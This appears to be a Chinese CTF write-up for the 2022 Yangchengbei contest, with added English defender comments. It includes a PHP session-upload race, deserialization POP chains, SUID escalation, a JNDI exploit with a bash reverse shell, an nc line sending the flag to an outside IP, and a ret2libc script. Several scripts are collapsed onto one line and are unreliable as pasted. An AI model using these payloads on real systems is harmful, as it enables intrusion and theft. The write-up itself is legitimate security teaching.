2022年羊城杯wp
web
rce_me
// rce_me challenge source as pasted (the opening <?php tag appears to have been
// lost in extraction). Defender's reading: the only guard between a
// user-supplied path and `include` is a case-insensitive substring deny-list
// (stristr) run over the raw query string. A deny-list in front of an include
// target is not a safe control; an allowlist of permitted files — or no
// user-controlled include at all — is.
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
    $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
    foreach($blacklist as $blackword){
        if(stristr($var, $blackword)) return False;   // case-insensitive match
    }
    return True;
}
if(fliter($_SERVER["QUERY_STRING"])){include $file;}else{die("Noooo0");}
获取webshell,题目中过滤了很多字符,但是可以利用echo写shell,参考链接
https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1
发现需要同时(并发)发包,用脚本即可直接实现
# Reviewer note (defender's view): the rce_me exploit script exactly as the
# write-up pasted it — its line breaks were lost in extraction and it is left
# untouched here. Visible below: one group of threads keeps POSTing a multipart
# upload that carries a PHP_SESSION_UPLOAD_PROGRESS field, while another group
# asks the vulnerable `include` for /tmp/sess_<PHPSESSID>; the write-up notes the
# two must run concurrently. The technique needs both an `include` of a
# user-controlled path and session.upload_progress.enabled=On; removing either
# (allowlisted includes; session.upload_progress.enabled=Off) closes it. A burst
# of multipart POSTs carrying that field together with requests whose file
# parameter points at /tmp/sess_* is the pattern to alert on.
# coding=utf-8import ioimport requestsimport threadingsessid = 'flag'data = {"cmd": "system('cat f*');"}url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"def write(session): while True: f = io.BytesIO(b'a' * 1024 * 50) resp = session.post(url,data={"PHP_SESSION_UPLOAD_PROGRESS":"');?>"},files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})def read(session): while True: resp = session.post(url+'?file=/tmp/sess_' + sessid,data=data) if 'tgao.txt' in resp.text: print(resp.text) event.clear() else: passif __name__ == "__main__": event = threading.Event() with requests.session() as session: for i in range(1, 30): threading.Thread(target=write, args=(session,)).start() for i in range(1, 30): threading.Thread(target=read, args=(session,)).start() event.set()
脚本运行约10秒后会报错,但 shell 已经上传成功
读取不到flag,需要提权
内核是Linux,考虑suid提权
# List setuid-root files (the write-up then used date from this list). The same
# command doubles as a hardening audit: any non-standard SUID binary it reports
# is a finding to remove or chmod u-s.
find / -perm -u=s -type f 2>/dev/null
利用date来提权
获取flag
step_by_step-v3
// step_by_step-v3 challenge source as shown (the opening <?php tag did not
// survive extraction). unserialize() is fed raw POST data while three classes
// with magic methods are loaded — the write-up's chain uses exactly that.
// Defender's fix: do not unserialize untrusted input at all (json_decode), or at
// least pass ['allowed_classes' => false]; and hint()'s include_once of a
// user-supplied path needs an allowlist, not a regex deny-list.
error_reporting(0);
class yang{
    public $y1;
    public function __construct() {
        $this->y1->magic();
    }
    // Runs when the object is used as a string: calls whatever $y1 holds.
    public function __tostring() {
        ($this->y1)();
    }
    public function hint() {
        include_once('hint.php');   // presumably defines $hey_mean_then — not shown here
        if(isset($_GET['file'])) {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file)) {
                die("nonono");
            }
            include_once($file);
        }
    }
}
class cheng{
    public $c1;
    // Runs on unserialize(): the write to $c1->flag fires $c1's __set when $c1 is a bei.
    public function __wakeup() {
        $this->c1->flag = 'flag';
    }
    public function __invoke() {
        $this->c1->hint();
    }
}
class bei{
    public $b1;
    public $b2;
    // print of $b1 triggers yang::__tostring when $b1 is a yang object.
    public function __set($k1,$k2) {
        print $this->b1;
    }
    public function __call($n1,$n2) {
        echo $this->b1;
    }
}
if (isset($_POST['ans'])) {
    unserialize($_POST['ans']);
} else {
    highlight_file(__FILE__);
}
?>
看代码可以直接调用tostring执行phpinfo,因此直接给类yang y1变量给phpinfo,赋值之后会调用bei类中__set方法,再去调用cheng类中tostring方法执行phpinfo
pop链
// step_by_step-v3 payload builder: the challenge's class names stripped to bare
// property holders, wired cheng->c1 = bei, bei->b1 = yang, yang->y1 = "phpinfo",
// then serialized. Kept as the author wrote it.
class yang{
    public $y1;
}
class cheng{
    public $c1;
}
class bei{
    public $b1;
    public $b2;
}
$yang=new yang();
$cheng=new cheng();
$bei=new bei();
$yang->y1="phpinfo";
$bei->b1=$yang;
$cheng->c1=$bei;
echo serialize($cheng);
?>
info中直接搜索flag
simple_json
打开附件是一个java的包,翻看源码包发现几个可疑点
存在三个路由:
版本为1.8
有2个log4j的包,并且有在Test.class下存在可疑的攻击点
转换json格式
{ "content":{ "@type":"ycb.simple_json.service.JNDIService", "target":"ldap://101.33.211.155:8087/aaa" }, "msg":{ "$ref":"$.content.context" }}
所以开始构造
需要用到的工具:https://github.com/Bl0omZ/JNDIEXP
利用链特殊说明snakeyaml : command=http://127.0.0.1:8080/exp.jar 加载恶意类。可以使用提供的yaml-payload-master(需要修改代码,重新生成jar,内附使用说明)。无法使用reverseshell。ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080/exp.jarldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwL2V4cC5qYXI%3DC3p0 :command=http://127.0.0.1:8080:Exploit(端口为默认为8080) data目录下的Exploit可以进行参考,直接修改Exploit.java的命令使用javac编译(不用另外起http服务)ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080:Exploitldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwOkV4cGxvaXQ%3D
参照这个进行
修改vps地址,再编译,放到工具的同级目录
// Reviewer note (defender's view): the class the write-up serves over JNDI,
// reproduced as shown — the gutter numbers 8–16 came from the author's editor
// and the class body continues past what was pasted (no closing brace here).
// The constructor is the whole payload: Runtime.exec runs the moment the class
// is instantiated. A JVM process spawning bash with a /dev/tcp argument, or an
// application server opening LDAP/HTTP connections to an unknown host during a
// JNDI lookup, is the indicator to alert on; not exposing the JSON `@type`
// deserialization entry point, and restricting outbound LDAP from the server,
// removes the path.
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/xx.xx.xx/9998 0>&1");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
用python3起一个http服务
python3 -m http.server 905
将JNDIInject-1.2-SNAPSHOT.jar服务起来
nc监听
burp发包触发
POST /ApiTest/post HTTP/1.1Host: 8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81Content-Length: 258Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Origin: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81/ApiTestAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{ "content":{ "@type":"ycb.simple_json.service.JNDIService", "target": "ldap://xx.xx.xx.xx:1389/snakeyaml/http://xx.xx.xx:905/exp.jar" }, "msg":{ "$ref":"$.content.context" }}
shell弹回来了
获取flag
ComeAndLogin
题目为登录可能存在注入
扫描目录存在5个文件访问
只有admin.php页面才能访问,需要admin权限
抓包发现username&password都存在注入
FUZZ发现username处过滤了单引号,并且%27,十六进制都被过滤,直接用反斜杠可以
页面返回正常
接着在password上测试,发现过滤了空格,考虑都使用url编码绕过
登录成功
再访问admin.php
根据代码提示需要以POST接收path参数的值,并且需要有大于三个以上的/,绕过即可
https://blog.csdn.net/m0_62805300/article/details/124218779
在参考文章中使用软链接获取flag
构造payload:
path=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag
Safepop
原题链接:https://xz.aliyun.com/t/10961
// Safepop payload builder, reproduced from the linked xz.aliyun.com write-up:
// a plain serialize() chain whose output is then edited once (see below).
class Fun{
    private $func;
    public function __construct(){
        // Could also be written as $this->func = "Test::getFlag"; since Test is
        // then never instantiated, Test's __wakeup() would not fire either.
        $this->func = [new Test,'getFlag'];
    }
}
class Test{
    public function getFlag(){
    }
}
class A{
    public $a;
}
class B{
    public $p;
}
$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;   // B declares only $p, so $a is created as a dynamic property
$r = serialize($b);
// Rewrites Fun's declared property count from 1 to 2 so the serialized string no
// longer matches the class definition (the write-up's intent; see the linked article).
$r1 = str_replace('"Fun":1:','"Fun":2:',$r);
echo urlencode($r1);
不用改直接贴
payload:
?pop=O%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Test%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7D%7D%7D
MISC
签到
寻宝
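"""寻宝: dump the file's bytes as hex with the two digits of each byte swapped."""


def swap_nibbles(data):
    """Return ``data`` as upper-case hex with the two digits of each byte reversed.

    Every byte becomes two upper-case hex digits and the pair is reversed
    (0x1A -> "A1"); the pairs are concatenated in input order. This is exactly
    what the original loop wrote to 1.txt.

    Args:
        data: ``bytes`` (or any iterable of ints in 0..255).

    Returns:
        A ``str`` of hex digits; empty for empty input.
    """
    return ''.join('{:02X}'.format(int(b))[::-1] for b in data)


def main(src='./寻宝', dst='./1.txt'):
    """Read ``src`` as bytes and write its nibble-swapped hex to ``dst``.

    Both files are opened with ``with`` so the handles are released even on
    error (the original never closed either). The original also printed the
    generator object itself, which is just its repr; that print is dropped.
    """
    with open(src, 'rb') as fh:
        raw = fh.read()
    with open(dst, 'w') as out:
        out.write(swap_nibbles(raw))


if __name__ == '__main__':
    main()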
解出的文本是十六进制
解出之后为
根据游戏和提示得到钢琴判断字符114514
根据图片看出为差分曼彻斯特编码01011111011000010011000101011111解出为_a1_
获取flag.zip密码
零宽度字符隐写
迷失幻境
取证题目,刚好有取证大师
将镜像放入取证大师
存在两个文件,一个是45文本文件,一个是jpg文件
挨个分析两个文件
首先是45文本文件,找了一个正常的png图片和在取证大师的十六进制中45文件对比,发现文件具备png的头部信息,但是缺少png头
将45文件,放入010加补全头部信息
提取出来完整的png图
接着看取证大师中的PNG文件,共有99张图,抽样分析发现图都是一样的,只是用来迷惑的
导出PNG图,用Stegsolve工具异或
接着分析jpg图,是一个萝莉照片,人畜无害
结合png图的key:可莉前来报道 ,应该是跟萝莉图有关
既然有密码也有图,图片也没有加密,只有考虑为隐写了,使用outguess工具得到flag
# outguess in retrieve mode: -k is the passphrase (the key recovered from the
# PNG), -r takes the carrier jpg and the file to write the extracted data to.
outguess -k "可莉前来报道" -r /home/kali/Desktop/test1/h.jpg flag.txt
where_is_secret
解出压缩包
再通过https://shimo.im/docs/gwpcxkryVJwyJVHR/read里的一起看小说吗
from PIL import Image


def decode(im):
    """Recover the text hidden in ``im``, one character per pixel.

    Pixels are scanned row by row. For each pixel the character code is
    ``(green << 8) + blue``; a pixel whose red, green and blue channels are all
    zero ends the scan of the current row. Returns the collected characters as
    a single string.

    NOTE(review): ``getpixel`` is unpacked into exactly three values, so the
    image is assumed to be RGB (an RGBA image would raise) — confirm for out.bmp.
    """
    width, height = im.size
    chars = []
    for y in range(height):
        for x in range(width):
            red, green, blue = im.getpixel((x, y))
            if not (blue | green | red):
                break
            chars.append(chr((green << 8) + blue))
    return ''.join(chars)


if __name__ == '__main__':
    hidden = decode(Image.open("./out.bmp", "r"))
    with open("decode.text", "w", encoding="utf-8") as f:
        f.write(hidden)
通过筛选{}中间的值就可以得到h1d3_1n_th3_p1ctur3
Unlimited Zip Works
解压看到有注释
用zipfile分析压缩包信息并提取注释信息
看到注释里面还有个压缩包
直接提取注释中的压缩包
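import zipfile


def unpack_chain(name='file'):
    """Follow the chain of nested archives that starts at ``<name>.zip``.

    Each archive holds the next one; the first five characters of that inner
    archive's member name are used as the password for ``extractall`` (this is
    the convention the original script relied on). The ``comment`` of every
    member seen along the way is collected. When a member named flag.txt is
    reached, the comments are concatenated in reverse order of discovery and
    written to ./newfile.zip.

    Args:
        name: basename (without ``.zip``) of the outermost archive.

    Returns:
        The number of archives opened.

    Raises:
        RuntimeError: an archive contains neither a nested zip nor flag.txt.
            The original re-opened the same file forever at that point.
    """
    comments = []
    opened = 0
    while True:
        # ``with`` closes the handle; the original leaked one ZipFile per level.
        with zipfile.ZipFile(name + '.zip', 'r') as fz:
            opened += 1
            next_name = None
            for member in fz.namelist():
                if "zip" in member:
                    next_name = member[0:5]
                    fz.extractall(pwd=bytes(next_name, 'utf-8'))
            for info in fz.infolist():
                comments.append(info.comment)
                if 'flag.txt' in str(info):
                    print('[+] 解压完成')
                    with open('./newfile.zip', 'wb') as f:
                        f.write(b''.join(reversed(comments)))
                    print("[+] 成功生成新压缩包newfile.zip")
                    return opened
        if next_name is None:
            raise RuntimeError(
                'no nested archive and no flag.txt in %s.zip' % name)
        name = next_name


if __name__ == "__main__":
    unpack_chain()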
新压缩包中还套着压缩包
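from zipfile import ZipFile


def extra_fields(archive):
    """Return the raw ZIP 'extra' field bytes of every member of ``archive``.

    Order is the central-directory order yielded by ``infolist``, which is the
    order the original script concatenated them in.
    """
    with ZipFile(archive, 'r') as zf:
        return [info.extra for info in zf.infolist()]


def main():
    """Concatenate newfile.zip's extra fields into flag.zip with a single write."""
    with open('flag.zip', 'wb') as fz:
        fz.write(b''.join(extra_fields('newfile.zip')))


# Entry guard so the module can be imported without touching the filesystem.
if __name__ == '__main__':
    main()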
脚本直接提
图片没什么内容
010分析下面又是压缩包直接提
躲猫猫
在流量包里发现有个zip,将它导出
找到一张png图片
发现压缩包里的key.log没有加密,将它导入并解密流量之后,在HTTP/2流量里发现了一张jpg图片,将它导出
找到压缩包密码
解出压缩包
看到脚本之后发现是某CTF原题,改一下x、y就能解密出来一张图片
https://blog.csdn.net/weixin_51122085/article/details/125851791
看到图片猜测为Dotcode,但是Dotcode的中间是圆形或者正方形,而解密出来的图片中间是五边形
在左侧列表中看到Maxicode中间是五边形的
CRYPTO
Easyrsa
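"""Easyrsa: peel a chain of RSA layers whose moduli all share the prime ``p``."""
import gmpy2

p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
e = 65537


def peel(ciphertext, moduli, p=p, e=e):
    """Strip one RSA layer per modulus and return the final integer plaintext.

    ``moduli`` are consumed in the order given (the caller passes output.txt's
    lines reversed, i.e. the last layer applied is undone first). For each n
    the cofactor is ``q = n // p``, d is the inverse of e modulo (p-1)(q-1), and
    the running value is replaced by ``pow(value, d, n)``.

    Args:
        ciphertext: int, the outermost ciphertext.
        moduli: iterable of int moduli, each divisible by ``p``.
        p: the shared prime factor.
        e: public exponent.
    """
    m = ciphertext
    for n in moduli:
        q = n // p
        d = int(gmpy2.invert(e, (p - 1) * (q - 1)))
        m = pow(m, d, n)
    return m


def main():
    """Read the moduli from output.txt (last line first) and print the plaintext."""
    with open('output.txt', 'r') as f:
        moduli = [int(line) for line in f.readlines()[::-1] if line.strip()]
    m = peel(c, moduli)
    # int.to_bytes instead of bytes.fromhex(hex(m)[2:]): the latter raises
    # ValueError whenever the hex string has an odd number of digits.
    print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))


if __name__ == '__main__':
    main()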
lrsa
$$\begin{aligned} t &= (p-58)P + q - kQ \\ kQ - (p-58)P &= q - t \approx q \\ L &= \begin{pmatrix} 1 & P \\ 0 & Q \end{pmatrix} \\ b &= (58-p,\, k)\,L = (58-p,\, q-t) \\ |b| &\le 2^{\frac{1}{4}} \det(L)^{\frac{1}{2}} \end{aligned}$$
由上面的式子关系,可以直接用格(LLL)规约出q-t;而t已知且很小,于是就能得到q
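"""lrsa: recover q from the two public products via gcd, then decrypt.

The paste had every statement run together and the long integer literals
split across lines; they are rejoined here. The lattice step was run in
Sage and is kept as the author left it, commented out; ``a`` is the value it
printed.
"""
from Crypto.Util.number import *

B = 1023
PPQ = 17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ = 17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
t = 44
c = 4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746
# The two public values look like P*P*Q and P*Q*Q (judging by their names), so
# the gcd is P*Q and one division each recovers P and Q.
PQ = GCD(PPQ, PQQ)
# The paste read `P=PPQ//PQQ=PQQ//PQ`: two statements fused into an invalid
# chained assignment. Split back into the only reading that makes sense.
P = PPQ // PQ
Q = PQQ // PQ
# sage P,Q,t=25947339118736016261419550658264175914664266822085997909314096786508816404704696671837899420298768803641977765786592354116676036035881712512184992851487828263900367476619650087372125353190561974783134059421570649293920248116730478378196277387377082481961542018611824082110164117796622604412648512092528479878502094797494405077897059911764470830302447618882229233093021156725194893124743848364119720591518073753197359351271987724752861168913839307431377592888760273762302003490303315903644695784992125784390012046834505490167165377346036077504298195544062111718133371983287540723388743607671934081891907851056034062109,26068172028162605137516470004551766376185367701690988148920400408760716114172673253571631718337447931195718779018987169967053546674529251665443499183399035216407895285607965767100708187327533611193709308966698251023076404422362272378862918994525181107002728889256377161661579892599243396304207048944032235378667269998644227976609632271355152717352269223310163307304914315780234040829575689991453848537587516055955657960061856059046256125836544109066275645648666876772298883460637600522819402448386193499472702636751025558486665290530268273787746964353937663176851849214999005525738643454160169651485201028944583316101,44
# L=matrix(ZZ,[[1,P],[0,Q]])
# print(L.LLL()[0][1])
a = 71239161441539946834999944364158306978517617517717217001776063773301330324729178632534286023377366747004115034635139042058644768011502688969022553791977558750633767627495955645170437100983708648876951588485253787441732757259210010467734037546118780321368088487269039555130213851691659851510403573663333586407
assert isPrime(a + t)   # sanity check that the lattice output plus t really is the prime q
q = a + t
e = 65537
d = inverse(e, q - 1)
m = pow(c, d, q)
print(long_to_bytes(m))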
PWN
.shell cat/flag | nc 124.223.104.219 1234
fakeNoOutput-v2
# Reviewer note (defender's view): the fakeNoOutput-v2 exploit script exactly as
# pasted — line breaks (including those inside the `head` triple-quoted string)
# were lost in extraction and it uses Python 2 pwntools idioms (`.next()`, str
# payloads) — so it is left untouched. What the visible constants say: the
# hard-coded 0x0804xxxx addresses and the 0x1040-byte padding followed by a
# 4-byte saved-return-address overwrite indicate a 32-bit non-PIE binary with
# no stack canary, presumably reading the request body into a fixed-size stack
# buffer; the first pass leaks the fwrite GOT entry to locate system()/"/bin/sh"
# in the served libc, the second pass reuses the same overflow. A bounded read,
# or stack protector plus PIE, would break this chain.
from pwn import*context.log_level='debug'elf=ELF('fakeNoOutput')p=remote('tcp.dasc.buuoj.cn',20112)#p=process('./fakeNoOutput')libc = ELF('libc.so.6')head='''head /upload HTTP/1.1HTTP_SERVER1_token: User-Agent: Cookie: Referer: Content-Length: 4196'''p.sendline(head)p.sendline('Content:filename=')text = 0x080496A1main = 0x8049F77setbuf = elf.got['fwrite']payload='a'*0x1040payload+='bbbb'payload+=p32(text)payload+=p32(main)payload+=p32(setbuf)p.sendline(payload + '\n')p.recvuntil('Connection: close\r\n\r\n')p.recvuntil('Connection: close\r\n\r\n')libc_base = u32(p.recv(4))-libc.sym['fwrite']system = libc_base+libc.sym['system']binsh = libc_base+libc.search('/bin/sh').next()p.sendline(head)p.sendline('Content:filename=')payload='a'*0x1040payload+='bbbb'payload+=p32(system)payload+='bbbb'payload+=p32(binsh)p.sendline(payload + '\n')p.interactive()
来源地址:https://blog.csdn.net/xjh8023/article/details/126688058